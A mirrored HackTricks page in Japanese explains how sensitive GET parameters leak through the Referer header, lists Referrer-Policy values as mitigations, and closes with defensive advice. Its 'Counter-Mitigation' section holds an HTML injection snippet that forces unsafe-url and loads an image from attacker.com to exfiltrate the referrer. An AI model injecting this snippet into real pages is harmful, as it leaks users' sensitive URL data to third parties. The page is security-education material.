mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
36 lines
1.5 KiB
Markdown
36 lines
1.5 KiB
Markdown
{{#include ./banners/hacktricks-training.md}}
|
||
|
||
# リファラーヘッダーとポリシー
|
||
|
||
リファラーは、ブラウザが前に訪れたページを示すために使用するヘッダーです。
|
||
|
||
## 機密情報の漏洩
|
||
|
||
ウェブページ内のどこかに機密情報がGETリクエストパラメータに存在する場合、そのページが外部ソースへのリンクを含んでいるか、攻撃者がユーザーに攻撃者が制御するURLを訪問させることができる(ソーシャルエンジニアリング)場合、最新のGETリクエスト内の機密情報を抽出することが可能です。
|
||
|
||
## 緩和策
|
||
|
||
ブラウザに**Referrer-policy**を遵守させることで、機密情報が他のウェブアプリケーションに送信されるのを**回避**することができます:
|
||
```
|
||
Referrer-Policy: no-referrer
|
||
Referrer-Policy: no-referrer-when-downgrade
|
||
Referrer-Policy: origin
|
||
Referrer-Policy: origin-when-cross-origin
|
||
Referrer-Policy: same-origin
|
||
Referrer-Policy: strict-origin
|
||
Referrer-Policy: strict-origin-when-cross-origin
|
||
Referrer-Policy: unsafe-url
|
||
```
|
||
## Counter-Mitigation
|
||
|
||
このルールはHTMLメタタグを使用して上書きできます(攻撃者はHTMLインジェクションを利用する必要があります):
|
||
```html
|
||
<meta name="referrer" content="unsafe-url">
|
||
<img src="https://attacker.com">
|
||
```
|
||
## 防御
|
||
|
||
GETパラメータやURLのパスに機密データを入れないでください。
|
||
|
||
{{#include ./banners/hacktricks-training.md}}
|